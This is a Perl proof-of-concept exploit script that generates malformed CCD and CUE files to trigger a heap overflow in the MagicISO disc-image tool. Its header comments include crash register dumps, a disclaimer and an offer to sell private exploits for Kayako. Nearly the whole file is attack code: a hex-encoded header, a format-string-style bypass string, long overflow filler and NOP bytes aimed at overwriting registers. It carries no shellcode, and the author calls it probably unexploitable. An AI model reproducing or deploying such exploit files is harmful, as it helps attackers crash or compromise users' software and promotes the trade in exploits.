#!/usr/bin/perl # # MagicISO CCD/Cue Local Heap Overflow Exploit Poc # ---------------------------------------------------------------- # Mountassif Moad # Stack .. # Cyber-Zone .. # # Private exploits for Kayako, contact me if anyone want buy it :d # # WARNING: Author has no responsibility over the damage done # Probably impossible to exploit, but who knows? -_-' # Regiter for ccd # EAX 44444141 # ECX 45459090 # EDX 90904443 # EBX 4545A094 # ESP 0012F3A0 # EBP 0012F3C4 # ESI 013AE64C # EDI 013AF650 # EIP 005C04CE MagicISO.005C04CE # Rgister for cue # EAX 0012F5D4 # ECX 013B0000 # EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...." # EBX 00001241 EBc overwrited 41 # ESP 0012F4D8 # EBP 0012F4E4 # ESI 00001200 # EDI 00000000 # EIP 0047FE91 MagicISO.0047FE91 # Crash sub help {print "[!] usage : \n perl $0 .cpp \n perl $0 .cue \n " ;exit();} &help unless $ARGV[0]; my $xpl = $ARGV[0]; my $header = "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69". "\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F". "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73". "\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63". "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43". "\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B". "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47". "\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70". "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30". "\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F". "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78". "\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34". "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69". "\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72". "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30". "\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31". "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65". "\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B". "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F". "\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D". "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72". "\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F". "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63". "\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C". "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D". "\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D". "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D". "\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D". "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E". "\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31". "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A". "\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D". "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D". "\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A". "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A". "\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33". "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74". "\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31". "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44". "\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D". "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D". "\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D". "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D". "\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D". "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46". "\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A". "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D". "\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39"; my $header1= "\x46\x49\x4c\x45\x20\x22"; my $header2= "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20". "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32". "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31". "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"; my $bypass= "\x39\x39\x39\x41\x78\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25". "\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x25\x4e\x25\x4e". "\x25\x4e\x25\x4e\x41\x63\x66\x63\x64\x32\x30\x38\x34\x39\x35\x64". "\x35\x36\x35\x65\x66\x36\x36\x65\x37\x64\x66\x66\x39\x66\x39\x38". "\x37\x36\x34\x64\x61\x63\x34\x63\x61\x34\x32\x33\x38\x61\x30"; my $edx = "\x43\x43\x43\x43"; my $Bof = "\x41" x 4004; my $eax = "\x44\x44\x44\x44"; my $Nop = "\x90" x 4; my $ecx = "\x45\x45\x45\x45"; my $Sop = "\x91" x 20; my $Hof = "\x46" x 5000; if ($xpl eq '.ccd') {open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done \n";} elsif ($xpl eq '.cue') {open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done \n"} else {&help}